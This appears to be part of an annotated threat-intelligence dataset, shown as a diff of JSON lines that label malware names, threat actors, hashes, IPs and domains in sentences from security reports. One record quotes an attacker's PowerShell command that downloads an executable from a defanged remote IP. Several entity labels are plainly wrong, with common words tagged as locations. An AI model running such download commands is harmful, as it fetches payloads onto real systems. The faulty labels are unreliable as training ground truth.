contacts[.]rvenee[.]com 91[.]207[.]7[.]91 89[.]18[.]27[.]159 89[.]37[.]226[.]108 185[.]25[.]51[.]116 185[.]81[.]113[.]95 185[.]144[.]83[.]82 185[.]153[.]198[.]58 185[.]159[.]129[.]226 Tags Malware | APT & Targeted Attacks | Endpoints | Cyber Crime | Research | Network","entities":[{"id":11786,"label":"SHA2","start_offset":194,"end_offset":258},{"id":11787,"label":"SHA2","start_offset":322,"end_offset":386},{"id":11788,"label":"SHA2","start_offset":398,"end_offset":462},{"id":11790,"label":"SHA2","start_offset":553,"end_offset":617},{"id":11792,"label":"SHA2","start_offset":634,"end_offset":698},{"id":11795,"label":"SHA2","start_offset":818,"end_offset":882},{"id":11799,"label":"IPV4","start_offset":1075,"end_offset":1092},{"id":11800,"label":"IPV4","start_offset":1093,"end_offset":1111},{"id":11801,"label":"IPV4","start_offset":1112,"end_offset":1131},{"id":11802,"label":"IPV4","start_offset":1132,"end_offset":1151},{"id":11803,"label":"IPV4","start_offset":1152,"end_offset":1171},{"id":11804,"label":"IPV4","start_offset":1172,"end_offset":1191},{"id":11805,"label":"IPV4","start_offset":1192,"end_offset":1212},{"id":11806,"label":"IPV4","start_offset":1213,"end_offset":1234},{"id":11784,"label":"SHA2","start_offset":64,"end_offset":128},{"id":11785,"label":"SHA2","start_offset":129,"end_offset":193},{"id":11789,"label":"SHA2","start_offset":475,"end_offset":539},{"id":11794,"label":"SHA2","start_offset":741,"end_offset":805},{"id":11796,"label":"SHA2","start_offset":894,"end_offset":958},{"id":11791,"label":"FILEPATH","start_offset":619,"end_offset":632},{"id":49741,"label":"DOMAIN","start_offset":1051,"end_offset":1074},{"id":49742,"label":"FILEPATH","start_offset":807,"end_offset":816},{"id":49743,"label":"FILEPATH","start_offset":884,"end_offset":892},{"id":49739,"label":"DOMAIN","start_offset":1008,"end_offset":1029},{"id":49740,"label":"DOMAIN","start_offset":1030,"end_offset":1050}],"relations":[],"Comments":[]} +{"id":1835,"text":"terminating the security products found running in the compromised system ","entities":[],"relations":[],"Comments":[]} +{"id":2203,"text":"The randomly chosen executable must not contain any of the following strings: This dropped malware begins by performing the same parent process check witnessed in the original sample.","entities":[],"relations":[],"Comments":[]} +{"id":1947,"text":"Malicious application for cricket news Solutions and Mitigation Taking note of these similarities and connections can help organizations and users in their continued defense against Urpage, Bahamut, Confucius, and Patchwork.","entities":[{"id":47070,"label":"threat-actor","start_offset":199,"end_offset":208},{"id":47071,"label":"threat-actor","start_offset":214,"end_offset":223},{"id":47068,"label":"threat-actor","start_offset":182,"end_offset":188},{"id":47069,"label":"threat-actor","start_offset":190,"end_offset":197}],"relations":[],"Comments":[]} +{"id":14335,"text":"Interestingly, we discovered an image that shows the logo of Round Year Fun, found at hxxp:\/\/miakhalifagame[.]com\/img\/ryf[.]jpg.","entities":[{"id":48563,"label":"URL","start_offset":86,"end_offset":127}],"relations":[],"Comments":[]} +{"id":1681,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":9690,"text":"Parser::inString method","entities":[],"relations":[],"Comments":[]} +{"id":13897,"text":"The group then continues its lateral movement through the system, eventually using the DC network share to deploy the ransomware to connected machines.","entities":[],"relations":[],"Comments":[]} +{"id":2412,"text":"Some well-known products such as Spring Boot and Spring Cloud are developed with the Spring Framework.","entities":[{"id":45506,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":45508,"label":"SOFTWARE","start_offset":85,"end_offset":101},{"id":45507,"label":"SOFTWARE","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} +{"id":3493,"text":"tail = str.find(\"&xl=\") if -1 ==tail: tail = str.find(\"&xl=\") if -1 == head or -1 == tail: print(\"can't find delimiter\") sys.exit()","entities":[],"relations":[],"Comments":[]} +{"id":10880,"text":"This shows that the actor is actively involved in the development of APK versions of the backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":2089,"text":"Unit 42 research encountered HelloXD, a ransomware family in its initial stages \u2013 but already intending to impact organizations.","entities":[{"id":6214,"label":"identity","start_offset":0,"end_offset":7},{"id":6215,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} +{"id":12899,"text":" What else do I need to consider?","entities":[],"relations":[],"Comments":[]} +{"id":6173,"text":"The victim will receive a spear-phishing email disguised as an advertisement with a discount coupon from an online shopping website \u2014 however, an obfuscated malicious JavaScript is embedded inside.","entities":[{"id":19086,"label":"location","start_offset":11,"end_offset":15},{"id":19087,"label":"location","start_offset":26,"end_offset":31},{"id":19088,"label":"attack-pattern","start_offset":32,"end_offset":40},{"id":19089,"label":"location","start_offset":93,"end_offset":99}],"relations":[],"Comments":[]} +{"id":1130,"text":"Meaning that the mutex either itself indicates a benign or malware sample, or that the mutex alone is not enough to make a determination and the statistical ratio of benign to malware is the best it can offer.","entities":[],"relations":[],"Comments":[]} +{"id":11527,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":35299,"label":"location","start_offset":72,"end_offset":75},{"id":35302,"label":"location","start_offset":135,"end_offset":138},{"id":35304,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} +{"id":10424,"text":"Detection name Description EFE51C2453821310C7A34DCA3054021D0F6D453B7133C381D75E3140901EFD12 Military Financing.xlsm W2KM_HTV.ZKGD-A","entities":[{"id":31687,"label":"SHA2","start_offset":27,"end_offset":91}],"relations":[],"Comments":[]} +{"id":232,"text":"We are also sharing a list of IoCs that were detected as phishing and scam URLs.","entities":[{"id":45931,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":45932,"label":"attack-pattern","start_offset":70,"end_offset":79}],"relations":[],"Comments":[]} +{"id":4453,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} +{"id":8800,"text":"Every malicious piece of this attack was hosted on legitimate services, making it harder for defenders to rely on network signals for detection.","entities":[],"relations":[],"Comments":[]} +{"id":3402,"text":"Win64.BIOPASS.A","entities":[{"id":49070,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} +{"id":3783,"text":"Channel : #redis getsome botVNC c399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5 C2 server : 5[.]39.217.212:80","entities":[{"id":11459,"label":"SHA2","start_offset":33,"end_offset":97},{"id":49622,"label":"IPV4","start_offset":110,"end_offset":127}],"relations":[],"Comments":[]} +{"id":2577,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":9696,"text":"The original string is then XOR\u2019ed with the 5-byte sequence.","entities":[],"relations":[],"Comments":[]} +{"id":1953,"text":"As an additional defense against the growing use of malicious mobile applications, enterprises and end users can benefit from multilayered mobile security solutions such as Trend Micro\u2122 Mobile Security for Android\u2122 which is also available on Google Play.","entities":[{"id":45192,"label":"SOFTWARE","start_offset":242,"end_offset":253},{"id":45193,"label":"SOFTWARE","start_offset":173,"end_offset":214}],"relations":[],"Comments":[]} +{"id":9270,"text":"We uncovered a recent activity involving the notorious online credit card skimming attack known as Magecart.","entities":[],"relations":[],"Comments":[]} +{"id":29,"text":" To answer the question in more detail, it\u2019s important to put yourself into the criminal\u2019s shoes and consider what alternative routes they have to monetize infections.","entities":[],"relations":[],"Comments":[]} +{"id":4504,"text":"On Search, Google\u2019s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50304,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} +{"id":4742,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50655,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":6688,"text":" Multiple sources have stated that the following three files were used to install and execute the ransomware attack on Windows systems: agent.exe | d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e mpsvc.dll | e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 mpsvc.dll | 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd Palo Alto Networks WildFire, Threat Prevention and Cortex XDR detect and prevent REvil ransomware infections.","entities":[{"id":20751,"label":"location","start_offset":83,"end_offset":86},{"id":20752,"label":"SHA1","start_offset":151,"end_offset":215},{"id":20753,"label":"SHA2","start_offset":228,"end_offset":292},{"id":20754,"label":"SHA1","start_offset":306,"end_offset":370},{"id":20755,"label":"identity","start_offset":372,"end_offset":390},{"id":20756,"label":"malware","start_offset":391,"end_offset":399},{"id":20757,"label":"location","start_offset":419,"end_offset":422},{"id":20758,"label":"tools","start_offset":423,"end_offset":433},{"id":20759,"label":"location","start_offset":441,"end_offset":444},{"id":20760,"label":"tools","start_offset":453,"end_offset":458}],"relations":[],"Comments":[]} +{"id":6079,"text":"Distribution of the actor\u2019s working hours suggest they might be working from a Central or an Eastern Europe timezone.","entities":[],"relations":[],"Comments":[]} +{"id":6932,"text":"In late 2021, we saw the group leverage CapraRAT, an Android RAT with clear similarities in design to the group\u2019s favored Windows malware, Crimson RAT.","entities":[{"id":21690,"label":"malware","start_offset":31,"end_offset":39},{"id":21692,"label":"malware","start_offset":53,"end_offset":64},{"id":21693,"label":"location","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} +{"id":4383,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":50196,"label":"malware","start_offset":28,"end_offset":39},{"id":50197,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[{"id":931,"from_id":50197,"to_id":50196,"type":"uses"}],"Comments":[]} +{"id":3824,"text":"Adds HTTP Headers {Variable}.http.get GET Header {Variable}.http.upload Uploads binaries\/data {Variable}.http.bin2str String manipulation {Variable}.http.downloadEx","entities":[],"relations":[],"Comments":[]} +{"id":393,"text":"Cortex XDR also includes multiple detections for post-exploitation activities.","entities":[{"id":44735,"label":"SOFTWARE","start_offset":0,"end_offset":10},{"id":44736,"label":"attack-pattern","start_offset":49,"end_offset":77}],"relations":[],"Comments":[]} +{"id":6464,"text":"The command above allows the attacker to get all the users from the domain controller.","entities":[],"relations":[],"Comments":[]} +{"id":13413,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":7712,"text":"Figure 9. Infection chains for FlawedAmmyy installation Figure 10.","entities":[{"id":23967,"label":"malware","start_offset":31,"end_offset":42}],"relations":[],"Comments":[]} +{"id":4034,"text":"Then, they use intranet penetration tools to build the connection between the victim\u2019s intranet and their command-and-control (C&C) servers.","entities":[],"relations":[],"Comments":[]} +{"id":3965,"text":"Patch your systems and applications.","entities":[],"relations":[],"Comments":[]} +{"id":2163,"text":"This allows execution of code within the context of Microsoft Word, even if macros are disabled.","entities":[{"id":45405,"label":"SOFTWARE","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} +{"id":6488,"text":"The following PowerShell command was used for this: powershell.exe iwr -uri hxxp:\/\/87.236.212[.]184\/out1 -outfile c:\\users\\public\\out1.exe -usebasicparsing","entities":[{"id":20137,"label":"attack-pattern","start_offset":14,"end_offset":24},{"id":20138,"label":"tools","start_offset":100,"end_offset":104}],"relations":[],"Comments":[]} +{"id":10,"text":" We can see here that server hostnames were changed but they didn\u2019t change the server IP address \u2013 see the attached file with results for files from last week\u2019s campaign from VirusTotal.","entities":[{"id":45807,"label":"SOFTWARE","start_offset":175,"end_offset":185}],"relations":[],"Comments":[]} +{"id":10703,"text":"These tools can also check for legal issues regarding the use of open-source software with different licensing terms and conditions.","entities":[{"id":32677,"label":"location","start_offset":12,"end_offset":15},{"id":32678,"label":"location","start_offset":21,"end_offset":26},{"id":32679,"label":"attack-pattern","start_offset":70,"end_offset":76},{"id":32680,"label":"location","start_offset":117,"end_offset":120}],"relations":[],"Comments":[]} +{"id":2680,"text":"It can affect both Windows and Linux OS, as the operator released a Linux version of LockBit 2.0 to target VMware ESXi hypervisor systems in October 2021, coded exclusively in the C programming language.","entities":[{"id":47882,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":47883,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":47884,"label":"SOFTWARE","start_offset":68,"end_offset":73},{"id":47886,"label":"SOFTWARE","start_offset":107,"end_offset":118},{"id":47887,"label":"TIME","start_offset":141,"end_offset":153},{"id":47885,"label":"threat-actor","start_offset":85,"end_offset":97}],"relations":[],"Comments":[]} +{"id":4398,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} +{"id":749,"text":" The main concept of an isolated heap is simple.","entities":[],"relations":[],"Comments":[]} +{"id":1167,"text":" Mutex name analysis as a whole offers a unique look into the results of any sample classification system and the malware therein.","entities":[],"relations":[],"Comments":[]} +{"id":6894,"text":" We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":21572,"label":"location","start_offset":11,"end_offset":15},{"id":21573,"label":"location","start_offset":90,"end_offset":96},{"id":21574,"label":"attack-pattern","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} +{"id":14194,"text":"Fighting back If the worst-case scenario does unfold and US organizations are attacked en masse, normal rules of best practice cybersecurity apply.","entities":[],"relations":[],"Comments":[]} +{"id":12948,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":40320,"label":"malware","start_offset":41,"end_offset":46}],"relations":[],"Comments":[]} +{"id":1716,"text":"I2P users can access specific I2P services that are only accessible on I2P, or access Internet resources without exposing their IP address. In the case of CryptoWall 3.0, the malware is attempting to access multiple .i2p resources only accessible through I2P, also known as \u201ceepSites.\u201d The CryptoWall 3.0 uses I2P in the same way CryptoWall 2.0 used Tor, to give victims access to a decrypting service to get their files back.","entities":[{"id":45105,"label":"SOFTWARE","start_offset":71,"end_offset":74},{"id":45104,"label":"SOFTWARE","start_offset":30,"end_offset":33},{"id":45106,"label":"malware","start_offset":156,"end_offset":170},{"id":45107,"label":"SOFTWARE","start_offset":256,"end_offset":260},{"id":45108,"label":"malware","start_offset":292,"end_offset":306},{"id":45110,"label":"SOFTWARE","start_offset":312,"end_offset":315},{"id":45111,"label":"malware","start_offset":332,"end_offset":346},{"id":45103,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":5104,"label":"tools","start_offset":352,"end_offset":355}],"relations":[{"id":250,"from_id":45111,"to_id":5104,"type":"uses"},{"id":252,"from_id":45108,"to_id":45111,"type":"related-to"},{"id":253,"from_id":45106,"to_id":45107,"type":"uses"},{"id":251,"from_id":45108,"to_id":45110,"type":"uses"}],"Comments":[]} +{"id":1587,"text":"It is similar to Petya\/NotPetya in terms of the impact of a successful attack.","entities":[{"id":45070,"label":"malware","start_offset":17,"end_offset":22},{"id":45071,"label":"malware","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} +{"id":4291,"text":"In this case, Confucius went with the common adage \u201csex sells\u201d Proactively monitor the organization\u2019s network.","entities":[{"id":50093,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} +{"id":654,"text":"Command and Control Petya contains no Command and Control mechanisms that we know of.","entities":[{"id":2153,"label":"malware","start_offset":21,"end_offset":26}],"relations":[],"Comments":[]} +{"id":397,"text":" Palo Alto Networks provides protection against the exploitation of this vulnerability in the following ways: Additionally, Xpanse has the ability to identify and detect Atlassian Confluence Servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization.","entities":[{"id":46095,"label":"identity","start_offset":1,"end_offset":19},{"id":46096,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":46097,"label":"SOFTWARE","start_offset":171,"end_offset":199}],"relations":[],"Comments":[]} +{"id":2161,"text":" The use of remote templates to deliver malicious documents is not new, however, historically they\u2019ve been used to host .docm or dotm (macro-enabled Word documents), which would still be affected by the local systems\u2019s Word macro policy.","entities":[{"id":47298,"label":"SOFTWARE","start_offset":219,"end_offset":224},{"id":47297,"label":"SOFTWARE","start_offset":149,"end_offset":153}],"relations":[],"Comments":[]} {"id":342,"text":"The majority of these have come through e-mails with executable attachments, sometimes contained in .zip files.","entities":[],"relations":[],"Comments":[]} -{"id":343,"text":"Most of the e-mail attacks used fake invoice, fax and voicemail themes with attachments named like the following:","entities":[],"relations":[],"Comments":[]} -{"id":344,"text":" In the last week we’ve seen the attack vectors evolve to contain exploit kits as well.","entities":[],"relations":[],"Comments":[]} -{"id":345,"text":"On October 19, the Kafeine posted a blog discussing the inclusion of CVE-2014-0556 in the Nuclear Pack exploit kit, which was installing CryptoWall 2.0.","entities":[{"id":44706,"label":"TIME","start_offset":3,"end_offset":13},{"id":44707,"label":"malware","start_offset":137,"end_offset":151},{"id":44708,"label":"vulnerability","start_offset":69,"end_offset":82},{"id":44709,"label":"malware","start_offset":90,"end_offset":114},{"id":44710,"label":"threat-actor","start_offset":19,"end_offset":26}],"relations":[{"id":15,"from_id":44707,"to_id":44708,"type":"exploits"},{"id":16,"from_id":44709,"to_id":44707,"type":"delivers"},{"id":17,"from_id":44710,"to_id":44709,"type":"authored-by"}],"Comments":[]} -{"id":346,"text":" Yesterday we picked up an e-mail campaign pretending to be a fax report that carried a .zip attachment with a PDF inside.","entities":[{"id":46034,"label":"campaign","start_offset":27,"end_offset":42}],"relations":[],"Comments":[]} -{"id":347,"text":"The PDF exploits CVE-2013-2729 to download a binary which also installed CryptoWall 2.0.","entities":[{"id":46035,"label":"malware","start_offset":74,"end_offset":88},{"id":46036,"label":"vulnerability","start_offset":18,"end_offset":31}],"relations":[{"id":151,"from_id":46035,"to_id":46036,"type":"exploits"}],"Comments":[]} -{"id":348,"text":" The best way to protect yourself against ransomware is to keep up-to-date backups of your important files.","entities":[],"relations":[],"Comments":[]} -{"id":349,"text":"A ransomware infection, which encrypts all of your files, is similar to a drive failure, except that for a small fee you have the chance to get your files back.","entities":[],"relations":[],"Comments":[]} -{"id":350,"text":" To protect against CryptoWall 2.0 we recommend taking the following actions: Adobe Reader Embedded BMP Parsing Integer Overflow Vulnerability CVE-2014-0556 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46038,"label":"SOFTWARE","start_offset":79,"end_offset":91},{"id":46039,"label":"vulnerability","start_offset":145,"end_offset":158},{"id":46037,"label":"malware","start_offset":20,"end_offset":34},{"id":46041,"label":"vulnerability","start_offset":92,"end_offset":143}],"relations":[{"id":152,"from_id":46037,"to_id":46039,"type":"exploits"}],"Comments":[]} -{"id":351,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":352,"text":"Yesterday, TrustedSec, a security consultancy based on Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160).","entities":[{"id":46042,"label":"TIME","start_offset":0,"end_offset":9},{"id":46043,"label":"identity","start_offset":11,"end_offset":21},{"id":46044,"label":"location","start_offset":55,"end_offset":59},{"id":46045,"label":"identity","start_offset":93,"end_offset":123},{"id":46047,"label":"vulnerability","start_offset":196,"end_offset":209},{"id":46046,"label":"vulnerability","start_offset":162,"end_offset":194}],"relations":[],"Comments":[]} -{"id":353,"text":"CHS’s 8-K filing on Monday did not reveal how the attackers got into their network, only that the records of approximately 4.5 million patients were stolen in attacks in between April and June of 2014.","entities":[{"id":46048,"label":"identity","start_offset":0,"end_offset":3},{"id":46049,"label":"TIME","start_offset":20,"end_offset":26},{"id":46050,"label":"TIME","start_offset":178,"end_offset":184},{"id":46051,"label":"TIME","start_offset":188,"end_offset":200}],"relations":[],"Comments":[]} -{"id":354,"text":"TrustedSec reports on how attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN.","entities":[{"id":44711,"label":"identity","start_offset":0,"end_offset":10},{"id":44712,"label":"vulnerability","start_offset":113,"end_offset":137},{"id":44713,"label":"tools","start_offset":167,"end_offset":170},{"id":44714,"label":"attack-pattern","start_offset":60,"end_offset":82}],"relations":[{"id":18,"from_id":44714,"to_id":44712,"type":"exploits"}],"Comments":[]} -{"id":355,"text":" We need more facts to be sure, but this instance may be the first public breach related to the Heartbleed vulnerability since it was announced in April.","entities":[{"id":46052,"label":"TIME","start_offset":147,"end_offset":152},{"id":46053,"label":"vulnerability","start_offset":96,"end_offset":120}],"relations":[],"Comments":[]} -{"id":356,"text":"Now, over four months since the Heartbleed disclosure, this attack reminds us of how serious this vulnerability is and how critical protection against it remains.","entities":[{"id":46054,"label":"vulnerability","start_offset":32,"end_offset":42}],"relations":[],"Comments":[]} -{"id":357,"text":" As Heartbleed allows the attacker to scrape memory from the vulnerable device, they can retrieve significant amounts of secret information.","entities":[{"id":44716,"label":"attack-pattern","start_offset":38,"end_offset":51},{"id":44715,"label":"vulnerability","start_offset":4,"end_offset":14}],"relations":[{"id":153,"from_id":44715,"to_id":44716,"type":"targets"}],"Comments":[]} -{"id":358,"text":"In this case, that apparently included VPN credentials, which they then used to log into the network and more laterally from system to system until discovering the data they were after.","entities":[{"id":46055,"label":"SOFTWARE","start_offset":39,"end_offset":42}],"relations":[],"Comments":[]} +{"id":3362,"text":"c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10176,"label":"malware","start_offset":11,"end_offset":22},{"id":48978,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":533,"from_id":48978,"to_id":10176,"type":"indicates"}],"Comments":[]} +{"id":6509,"text":" Figure 10. deobfuscated PowerShell backdoor The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor.","entities":[{"id":20163,"label":"attack-pattern","start_offset":29,"end_offset":39},{"id":20164,"label":"location","start_offset":95,"end_offset":99},{"id":20165,"label":"attack-pattern","start_offset":117,"end_offset":127}],"relations":[],"Comments":[]} +{"id":13425,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[{"id":41782,"label":"location","start_offset":36,"end_offset":45},{"id":41783,"label":"tools","start_offset":52,"end_offset":59}],"relations":[],"Comments":[]} +{"id":11655,"text":"The downloaded RTF files exploit the CVE-2017-11882 vulnerability","entities":[],"relations":[],"Comments":[]} +{"id":1387,"text":"The following file extensions are overwritten with a one-byte value of 0xCC.","entities":[],"relations":[],"Comments":[]} +{"id":12523,"text":" This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2021.","entities":[],"relations":[],"Comments":[]} +{"id":1186,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":1970,"text":" When a client sends the DTLS ClientHello packet to the server, the server computes a Message Authentication Code (MAC) on it and compares it to the cookie contained in the packet.","entities":[],"relations":[],"Comments":[]} +{"id":9490,"text":"We discuss the full details of both in our research paper.","entities":[],"relations":[],"Comments":[]} +{"id":5095,"text":"If the RCE was successful, the javascript would request the next stage referenced within the script as \u201cSBX\u201d, a common acronym for Sandbox Escape.","entities":[{"id":51198,"label":"attack-pattern","start_offset":7,"end_offset":10},{"id":51199,"label":"attack-pattern","start_offset":131,"end_offset":145}],"relations":[],"Comments":[]} +{"id":283,"text":" Unit 42, the threat intelligence and security consulting arm of Palo Alto Networks, has a team of experts who can help your organization assess and test your security controls with proactive assessments and incident simulation services.","entities":[{"id":45970,"label":"identity","start_offset":1,"end_offset":8},{"id":45971,"label":"identity","start_offset":65,"end_offset":83}],"relations":[],"Comments":[]} +{"id":28,"text":"There are three factors at work:","entities":[],"relations":[],"Comments":[]} +{"id":10229,"text":"This mistake was corrected swiftly, but it shows the relative inexperience of this particular Pawn Storm operator.","entities":[],"relations":[],"Comments":[]} +{"id":2722,"text":" In this particular case, Microsoft is known to release updates on Patch Tuesday, which was two days prior to this out-of-band update.","entities":[{"id":47963,"label":"SOFTWARE","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} +{"id":13949,"text":"Phase 4: Quadruple extortion.","entities":[],"relations":[],"Comments":[]} +{"id":2151,"text":" On May 30, Keven Beaumont wrote an article detailing the specifics of the initial incident.","entities":[{"id":45404,"label":"identity","start_offset":12,"end_offset":26},{"id":45403,"label":"TIME","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} +{"id":12956,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":820,"text":"The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation.","entities":[{"id":46367,"label":"FILEPATH","start_offset":51,"end_offset":62},{"id":46368,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} +{"id":9877,"text":"This blog was originally published on November 13, 2019.","entities":[],"relations":[],"Comments":[]} +{"id":3818,"text":"Koadic commands and output when ANEL 5.1.2 rc1 is used","entities":[{"id":11594,"label":"malware","start_offset":0,"end_offset":6},{"id":11596,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} +{"id":146,"text":" The way ransomware works is well documented, but let\u2019s recap here.","entities":[],"relations":[],"Comments":[]} +{"id":6606,"text":"The target radius for these groups have spanned across the globe, across all major industries.","entities":[{"id":20467,"label":"location","start_offset":4,"end_offset":10},{"id":20468,"label":"malware","start_offset":59,"end_offset":64},{"id":20469,"label":"location","start_offset":77,"end_offset":82}],"relations":[],"Comments":[]} +{"id":4926,"text":"This spike is largely due to blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.","entities":[{"id":50942,"label":"threat-actor","start_offset":96,"end_offset":101},{"id":50943,"label":"threat-actor","start_offset":105,"end_offset":115},{"id":50941,"label":"location","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} +{"id":699,"text":", it is important that organizations know how to defend against these common techniques.","entities":[],"relations":[],"Comments":[]} +{"id":6140,"text":" Table 7 ","entities":[],"relations":[],"Comments":[]} +{"id":9790,"text":"Trend Micro\u2122 Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":29820,"label":"location","start_offset":48,"end_offset":53},{"id":29821,"label":"location","start_offset":98,"end_offset":108},{"id":29822,"label":"location","start_offset":112,"end_offset":116},{"id":29823,"label":"attack-pattern","start_offset":132,"end_offset":146},{"id":29824,"label":"location","start_offset":160,"end_offset":163}],"relations":[],"Comments":[]} +{"id":4636,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":50556,"label":"malware","start_offset":28,"end_offset":39},{"id":14084,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} +{"id":13345,"text":" Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":14282,"text":"Get and upload Accounts tree","entities":[],"relations":[],"Comments":[]} +{"id":11587,"text":"Installing the downloaded APK requires the victim to enable installation of applications from unknown sources.","entities":[],"relations":[],"Comments":[]} +{"id":6151,"text":"Additional investigation shows that the threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.","entities":[{"id":19031,"label":"location","start_offset":63,"end_offset":68},{"id":19032,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":19033,"label":"location","start_offset":162,"end_offset":165},{"id":19036,"label":"location","start_offset":220,"end_offset":226}],"relations":[],"Comments":[]} +{"id":12835,"text":"Network traffic analysis, deployment of firewalls and intrusion detection and prevention systems, network segmentation, and data categorization are just some of them.","entities":[{"id":39989,"label":"location","start_offset":50,"end_offset":53},{"id":39990,"label":"location","start_offset":74,"end_offset":77},{"id":39991,"label":"location","start_offset":120,"end_offset":123},{"id":39992,"label":"location","start_offset":144,"end_offset":147},{"id":39993,"label":"identity","start_offset":148,"end_offset":152},{"id":39994,"label":"location","start_offset":161,"end_offset":165}],"relations":[],"Comments":[]} +{"id":3665,"text":"What happens in Carbanak and FIN7 attacks?","entities":[{"id":49448,"label":"threat-actor","start_offset":16,"end_offset":24},{"id":49449,"label":"threat-actor","start_offset":29,"end_offset":33}],"relations":[],"Comments":[]} +{"id":9948,"text":"As mentioned above, APT33 is known to use spear phishing emails to gain entry into a target\u2019s network, and given their malicious activity the threat is definitively serious.","entities":[{"id":30375,"label":"threat-actor","start_offset":20,"end_offset":25},{"id":30376,"label":"attack-pattern","start_offset":42,"end_offset":56},{"id":30377,"label":"location","start_offset":85,"end_offset":91},{"id":30378,"label":"location","start_offset":103,"end_offset":106},{"id":30379,"label":"location","start_offset":107,"end_offset":112}],"relations":[],"Comments":[]} +{"id":10300,"text":".Win32.TRX.XXPE50FFF039 c8b6291fc7b6339d545cbfa99256e26de26fff5f928fef5157999d121fe46135","entities":[{"id":31451,"label":"SHA2","start_offset":25,"end_offset":89}],"relations":[],"Comments":[]} +{"id":10325,"text":"In March 2018, we provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater.","entities":[{"id":31472,"label":"location","start_offset":58,"end_offset":66},{"id":31473,"label":"tools","start_offset":72,"end_offset":76}],"relations":[],"Comments":[]} +{"id":3195,"text":"The fake Silverlight download page of the watering hole attack Figure 6.","entities":[{"id":48322,"label":"SOFTWARE","start_offset":9,"end_offset":20},{"id":48323,"label":"attack-pattern","start_offset":42,"end_offset":62}],"relations":[],"Comments":[]} +{"id":3656,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":12863,"text":" Figure 1 - A Technique detection named \"User Execution of Office Related Document\" was generated when explorer.exe spawned winword.exe when the user clicked 